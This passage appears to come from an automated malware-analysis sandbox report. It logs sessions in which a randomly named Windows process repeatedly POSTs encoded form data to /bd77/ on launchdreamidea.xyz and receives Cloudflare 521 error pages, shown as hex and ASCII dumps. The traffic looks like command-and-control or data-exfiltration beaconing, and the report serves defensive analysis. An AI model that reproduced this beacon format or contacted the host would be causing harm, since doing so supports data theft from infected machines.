                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1228&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=769&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--
                                                                                                                          Oct 21, 2024 17:25:41.935970068 CEST1236INData Raw: 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 61 75 6e 63 68 64 72 65 61 6d 69 64 65 61 2e 78 79 7a 20 7c 20 35 32 31 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 64 6f 77 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20
                                                                                                                          Data Ascii: ><head><title>www.launchdreamidea.xyz | 521: Web server is down</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robo
                                                                                                                          Oct 21, 2024 17:25:41.935985088 CEST1236INData Raw: 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 66 69 78 20
                                                                                                                          Data Ascii: <div class="w-240 lg:w-full mx-auto"> <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border
                                                                                                                          Oct 21, 2024 17:25:41.936049938 CEST1236INData Raw: 72 65 72 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 69 63 6f 6e 2d 63 6c 6f 75 64 20 62 6c 6f 63 6b 20 6d 64 3a 68 69 64 64 65 6e 20 68 2d 32 30 20 62 67 2d 63 65 6e 74 65 72 20 62 67 2d 6e 6f 2d 72 65 70 65 61 74 22 3e
                                                                                                                          Data Ascii: rer"> <span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span> <span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span class="md:blo
                                                                                                                          Oct 21, 2024 17:25:41.936064005 CEST848INData Raw: 74 65 78 74 2d 32 78 6c 20 74 65 78 74 2d 67 72 61 79 2d 36 30 30 20 66 6f 6e 74 2d 6c 69 67 68 74 20 6c 65 61 64 69 6e 67 2d 31 2e 33 22 3e 0a 20 20 20 20 0a 20 20 20 20 48 6f 73 74 0a 20 20 20 20 0a 20 20 3c 2f 68 33 3e 0a 20 20 3c 73 70 61 6e
                                                                                                                          Data Ascii: text-2xl text-gray-600 font-light leading-1.3"> Host </h3> <span class="leading-1.3 text-2xl text-red-error">Error</span></div> </div> </div> </div> <div class="w-240 lg:w-full m
                                                                                                                          Oct 21, 2024 17:25:41.936075926 CEST1236INData Raw: 6d 62 2d 32 22 3e 49 66 20 79 6f 75 20 61 72 65 20 61 20 76 69 73 69 74 6f 72 20 6f 66 20 74 68 69 73 20 77 65 62 73 69 74 65 3a 3c 2f 68 33 3e 0a 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 36 22 3e 50 6c 65 61 73 65 20 74 72 79 20
                                                                                                                          Data Ascii: mb-2">If you are a visitor of this website:</h3> <p class="mb-6">Please try again in a few minutes.</p> <h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3> <p><span>Contact your hosting provider
                                                                                                                          Oct 21, 2024 17:25:41.936213970 CEST774INData Raw: 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d
                                                                                                                          Data Ascii: </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=www.launchdreamidea.x


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 50002 | 188.114.96.3 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:25:43.983957052 CEST | 793 | OUT | POST /bd77/ HTTP/1.1
Host: www.launchdreamidea.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.launchdreamidea.xyz
Referer: http://www.launchdreamidea.xyz/bd77/
Content-Length: 234
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Raw: 71 46 48 6c 49 3d 6e 57 30 34 4f 68 76 43 5a 55 55 47 4c 4e 48 48 31 64 75 66 36 37 33 62 68 66 6a 57 55 4f 66 55 5a 45 4b 4b 6e 62 74 71 54 37 35 51 4b 58 4a 32 42 51 70 4c 78 38 53 4e 49 45 65 2f 41 7a 79 68 46 6b 6f 6f 42 73 7a 77 5a 79 34 69 61 64 38 6c 48 65 48 67 79 31 64 43 78 7a 37 2f 37 59 38 72 59 73 47 44 50 50 71 72 63 4a 6e 50 42 72 68 65 6b 58 4f 48 49 59 45 2f 68 71 49 51 47 72 33 4b 56 6e 52 36 55 4e 6f 73 6c 46 61 53 49 2b 5a 42 38 78 77 52 34 42 79 54 58 38 58 56 47 66 67 6b 39 33 39 78 71 78 46 53 6d 74 65 6e 76 75 39 63 50 77 4a 6d 44 5a 52 62 31 72 30 64 58 45 39 61 46 59 66 6e 49 41 75 2b 5a 74 6a 75 2b 75 4b 50 68 49 66 44 7a 79 34 4a 7a 76 50 48 2b 56 54 71 5a 41 3d 3d
Data Ascii: qFHlI=nW04OhvCZUUGLNHH1duf673bhfjWUOfUZEKKnbtqT75QKXJ2BQpLx8SNIEe/AzyhFkooBszwZy4iad8lHeHgy1dCxz7/7Y8rYsGDPPqrcJnPBrhekXOHIYE/hqIQGr3KVnR6UNoslFaSI+ZB8xwR4ByTX8XVGfgk939xqxFSmtenvu9cPwJmDZRb1r0dXE9aFYfnIAu+Ztju+uKPhIfDzy4JzvPH+VTqZA==
Oct 21, 2024 17:25:44.510607958 CEST | 1236 | IN | HTTP/1.1 521
Date: Mon, 21 Oct 2024 15:25:44 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 6879
Connection: close
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z5X8LMC0Lyfi4rRTLC0sysX%2FRiJb5HY5J0VNeV2d%2B92XmyhfXTLftMNPZAAEKNySBA0V58e2NfbVxqeP5MPsRAX8ZknHU9FwtLNm3NKAJvw9I4c%2F6i%2BNux0%2FPrdTzlhAfMA2pS%2FR87rFcA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 8d6243101a8219ef-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1798&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=793&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d
Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> <!-
Oct 21, 2024 17:25:44.510621071 CEST | 1236 | IN | Data Raw: 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 61 75 6e 63 68 64 72 65 61 6d 69 64 65 61 2e 78 79 7a 20 7c 20 35 32 31 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 64 6f 77 6e 3c 2f 74
Data Ascii: -<![endif]--><head><title>www.launchdreamidea.xyz | 521: Web server is down</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><met
Oct 21, 2024 17:25:44.510632992 CEST | 424 | IN | Data Raw: 67 72 61 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73
Data Ascii: gray"> <div class="w-240 lg:w-full mx-auto"> <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border
Oct 21, 2024 17:25:44.510639906 CEST | 1236 | IN | Data Raw: 68 2d 32 30 20 62 67 2d 63 65 6e 74 65 72 20 62 67 2d 6e 6f 2d 72 65 70 65 61 74 22 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 69 63 6f 6e 2d 6f 6b 20 77 2d 31 32 20 68 2d 31 32 20 61 62 73 6f 6c 75 74
Data Ascii: h-20 bg-center bg-no-repeat"></span> <span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span> </div> <span class="md:block w-full truncate">You</span> <h3 class="md:inline-blo
Oct 21, 2024 17:25:44.510648966 CEST | 1236 | IN | Data Raw: 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 65 72 72 6f 72 63 6f 64 65 5f 35 32 31 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 77 77 77 2e 6c 61 75 6e 63 68 64 72 65 61 6d 69 64 65 61 2e 78 79 7a 22 20 74 61 72 67 65 74
Data Ascii: rror-landing?utm_source=errorcode_521&utm_campaign=www.launchdreamidea.xyz" target="_blank" rel="noopener noreferrer"> Cloudflare </a> </h3> <span class="leading-1.3 text-2xl text-green-success">Working</span></div><div id="cf-h
Oct 21, 2024 17:25:44.510656118 CEST | 424 | IN | Data Raw: 20 20 20 3c 68 32 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 33 78 6c 20 66 6f 6e 74 2d 6e 6f 72 6d 61 6c 20 6c 65 61 64 69 6e 67 2d 31 2e 33 20 6d 62 2d 34 22 3e 57 68 61 74 20 68 61 70 70 65 6e 65 64 3f 3c 2f 68 32 3e 0a 20 20 20 20 20 20 20 20 20
Data Ascii: <h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2> <p>The web server is not returning a connection. As a result, the web page is not displaying.</p> </div> <div class="w
Oct 21, 2024 17:25:44.510703087 CEST | 1236 | IN | Data Raw: 6e 74 2d 73 65 6d 69 62 6f 6c 64 20 6d 62 2d 32 22 3e 49 66 20 79 6f 75 20 61 72 65 20 61 20 76 69 73 69 74 6f 72 20 6f 66 20 74 68 69 73 20 77 65 62 73 69 74 65 3a 3c 2f 68 33 3e 0a 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 36 22
Data Ascii: nt-semibold mb-2">If you are a visitor of this website:</h3> <p class="mb-6">Please try again in a few minutes.</p> <h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3> <p><span>Contact your host
Oct 21, 2024 17:25:44.510710001 CEST | 786 | IN | Data Raw: 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72
Data Ascii: ll;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=www.launc


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 50003 | 188.114.96.3 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:25:46.538314104 CEST | 1806 | OUT | POST /bd77/ HTTP/1.1
Host: www.launchdreamidea.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Origin: http://www.launchdreamidea.xyz
Referer: http://www.launchdreamidea.xyz/bd77/
Content-Length: 1246
Content-Type: application/x-www-form-urlencoded
Connection: close
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Data Raw: 71 46 48 6c 49 3d 6e 57 30 34 4f 68 76 43 5a 55 55 47 4c 4e 48 48 31 64 75 66 36 37 33 62 68 66 6a 57 55 4f 66 55 5a 45 4b 4b 6e 62 74 71 54 37 78 51 4b 6b 78 32 4f 54 78 4c 77 38 53 4e 4a 45 65 79 41 7a 7a 68 46 6b 77 6b 42 73 2f 4b 5a 30 6b 69 62 2b 30 6c 41 76 48 67 38 31 64 43 7a 7a 37 36 32 34 39 6a 59 76 75 48 50 4d 53 72 63 4a 6e 50 42 71 78 65 6a 44 61 48 4b 59 45 34 32 61 4a 52 52 62 32 74 56 6e 5a 4d 55 4e 74 52 6b 31 36 53 52 65 70 42 2b 44 6f 52 30 42 79 4e 57 38 57 51 47 66 64 38 39 33 4a 39 71 77 77 4a 6d 74 71 6e 2f 34 6b 55 58 77 31 6e 57 59 63 34 6d 35 74 34 57 7a 34 71 41 4c 37 5a 41 6a 53 51 55 38 66 64 77 2b 43 49 70 4c 2b 44 39 52 59 2b 34 34 57 50 33 6c 61 50 64 57 6c 75 38 48 45 77 67 48 6a 36 71 37 4e 33 68 75 4a 4e 76 52 6a 56 47 73 46 4e 2b 51 73 2f 4d 31 56 73 56 46 67 75 45 39 68 5a 44 32 52 38 46 74 6f 45 38 62 73 4c 33 35 74 73 61 77 45 54 63 6b 53 4d 49 30 6a 61 32 31 79 74 69 48 51 4c 37 52 68 54 52 41 32 78 44 43 71 71 67 48 2f 46 68 75 6c 62 74 37 79 6b 61 38 39 70 [TRUNCATED]
Data Ascii: qFHlI=nW04OhvCZUUGLNHH1duf673bhfjWUOfUZEKKnbtqT7xQKkx2OTxLw8SNJEeyAzzhFkwkBs/KZ0kib+0lAvHg81dCzz76249jYvuHPMSrcJnPBqxejDaHKYE42aJRRb2tVnZMUNtRk16SRepB+DoR0ByNW8WQGfd893J9qwwJmtqn/4kUXw1nWYc4m5t4Wz4qAL7ZAjSQU8fdw+CIpL+D9RY+44WP3laPdWlu8HEwgHj6q7N3huJNvRjVGsFN+Qs/M1VsVFguE9hZD2R8FtoE8bsL35tsawETckSMI0ja21ytiHQL7RhTRA2xDCqqgH/Fhulbt7yka89p4fypBZOy0mEzQbl47wxcng71IPSfJhPvUDkrbDF9PlqKyq0NHt6Fc1bmVPBj+OnaYOThtansp3rcTDhB8xBKXgaCSSvaHZj3XP4B2YQoaoH+5ZIS/NK2hsvpw9ybdGYHTNwRungQiIbOsmnoI66O0ypD8FFxIn+MojkPaOcqD5QSuApxIrsaugGg3/Gc71bKhgPq2ga30t+Mfq2FrokF0Xy08Q6ayTFbw11q/mDuAPc7cpa2hr6rqLqt8PnDzuomiBFQ+WVN1f02IRiwP+fPXFctCRztBjsF+t/RpMoRKxZQbPIyKL0ORcisfpceDBUawl6sHoCZDoDIAPtwa1DgrirIP0LwterZJPZIXVACy93SypcIkpegKPXI4rUzz9+00YP0Bh15vnOeYIZJIqQE+kkf6v+XGWqPulsO0IOz3rWbZI0ABqMu6yfDqTSVx9BP1gSQhP3YfAB1eDHrng7EROsPpEbKhZI4iwqVQP/DPHXKOiyAymKh9fZ7vKQAqkChJoNLxmRZzaQF/A437lu1wQmTO7aZ2rBW7qponN5EpUxjXCdhXBSiEmw3jHdC+b/I+Dh4xR8tqwFRdYKXhXwsg1Z1Twwj0gKpxPXWWjSxvrzNgVaYkJWlJpXk0s2KU+/2hhExtdSfku0oon0RS+Wqvlaz1p/L8qrLtN [TRUNCATED]
Oct 21, 2024 17:25:47.065124035 CEST | 1236 | IN | HTTP/1.1 521
Date: Mon, 21 Oct 2024 15:25:47 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 6879
Connection: close
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=peTYctmP%2BydCjo6eTfb2%2FWVgQu8z9kXp69FP55tSRJQS5C0BWKRlGqbJmAZbwpHROvVqlMav%2BbrAKchW8g1dUNBQA4xTKfRFcZNj%2BPoxyuklUHDIEBiwIoImIsRQrPCWnHFwogb0fLmwlA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Server: cloudflare
CF-RAY: 8d624320188617a9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1249&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1806&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21
Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<!
Oct 21, 2024 17:25:47.065136909 CEST | 1236 | IN | Data Raw: 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 0a 0a 3c 74 69 74 6c 65 3e 77 77 77 2e 6c 61 75 6e 63 68 64 72 65 61 6d 69 64 65 61 2e 78 79 7a 20 7c 20 35 32 31 3a 20 57 65 62 20 73 65 72 76 65 72 20 69 73 20 64 6f 77 6e 3c 2f 74 69 74 6c
Data Ascii: [endif]--><head><title>www.launchdreamidea.xyz | 521: Web server is down</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta n
Oct 21, 2024 17:25:47.065200090 CEST | 1236 | IN | Data Raw: 79 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 2d 32 34 30 20 6c 67 3a 77 2d 66 75 6c 6c 20 6d 78 2d 61 75 74 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
Data Ascii: y"> <div class="w-240 lg:w-full mx-auto"> <div class="clearfix md:px-8"> <div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0
Oct 21, 2024 17:25:47.065234900 CEST | 1236 | IN | Data Raw: 72 20 6e 6f 72 65 66 65 72 72 65 72 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 69 63 6f 6e 2d 63 6c 6f 75 64 20 62 6c 6f 63 6b 20 6d 64 3a 68 69 64 64 65 6e 20 68 2d 32 30 20 62 67 2d 63 65 6e 74 65 72 20 62 67 2d 6e 6f
Data Ascii: r noreferrer"> <span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span> <span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span> </a> </div> <span clas
Oct 21, 2024 17:25:47.065289974 CEST | 848 | IN | Data Raw: 20 6d 64 3a 6d 74 2d 30 20 74 65 78 74 2d 32 78 6c 20 74 65 78 74 2d 67 72 61 79 2d 36 30 30 20 66 6f 6e 74 2d 6c 69 67 68 74 20 6c 65 61 64 69 6e 67 2d 31 2e 33 22 3e 0a 20 20 20 20 0a 20 20 20 20 48 6f 73 74 0a 20 20 20 20 0a 20 20 3c 2f 68 33
Data Ascii: md:mt-0 text-2xl text-gray-600 font-light leading-1.3"> Host </h3> <span class="leading-1.3 text-2xl text-red-error">Error</span></div> </div> </div> </div> <div class="w-240 lg
Oct 21, 2024 17:25:47.065325975 CEST | 1236 | IN | Data Raw: 73 65 6d 69 62 6f 6c 64 20 6d 62 2d 32 22 3e 49 66 20 79 6f 75 20 61 72 65 20 61 20 76 69 73 69 74 6f 72 20 6f 66 20 74 68 69 73 20 77 65 62 73 69 74 65 3a 3c 2f 68 33 3e 0a 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 36 22 3e 50 6c
Data Ascii: semibold mb-2">If you are a visitor of this website:</h3> <p class="mb-6">Please try again in a few minutes.</p> <h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3> <p><span>Contact your hosting
Oct 21, 2024 17:25:47.065365076 CEST | 783 | IN | Data Raw: 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72
Data Ascii: </span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance &amp; security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=www.launchdr


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 50004 | 188.114.96.3 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 21, 2024 17:25:49.077462912 CEST | 502 | OUT | GET /bd77/?DJ=uNx48jdPyvmhqtM0&qFHlI=qUcYNRi6MmsiGKriyom62ti4lIWHctjIcWj4n4RDTJ9SK0tIDWNU+4/fdEnUeQPlIjs5HOj1IjY+OoVWBoHC3UpiwTnXxeZhDJSRDe+gKqbpDrlYtFKzXKQkj7Y9H+PYGWNXRqA= HTTP/1.1
                                                                                                                          Host: www.launchdreamidea.xyz
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                          Accept-Language: en-US,en
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
Oct 21, 2024 17:25:49.589481115 CEST | 943 | IN | HTTP/1.1 521
                                                                                                                          Date: Mon, 21 Oct 2024 15:25:49 GMT
                                                                                                                          Content-Type: text/plain; charset=UTF-8
                                                                                                                          Content-Length: 15
                                                                                                                          Connection: close
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=08U2twkwazP7Lq%2FE6m4StYTpx2lmMelqAdakxOLB0jZeCYcHtGRKAk95%2BHgPWTpdeMIBxxmTj2E3r7hGtolj3SvstA34q5hH6ciTgEZ%2Bu39yVU03EigvKsP7SQXFxbyP2nsOgJccQn9fpw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                          Referrer-Policy: same-origin
                                                                                                                          Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8d6243300ddc0f7d-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1192&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=502&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 31
                                                                                                                          Data Ascii: error code: 521


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 50005 | 3.33.130.190 | 80 | 2656 | C:\Program Files (x86)\kllpcdNeeVJONqeYHAZtXWLsjhvFWqjCiAcmmCVmeleUIYYszaOvkBUXfTfTyehWtF\OmmtmfniIsg.exe
Timestamp | Bytes transferred | Direction | Data
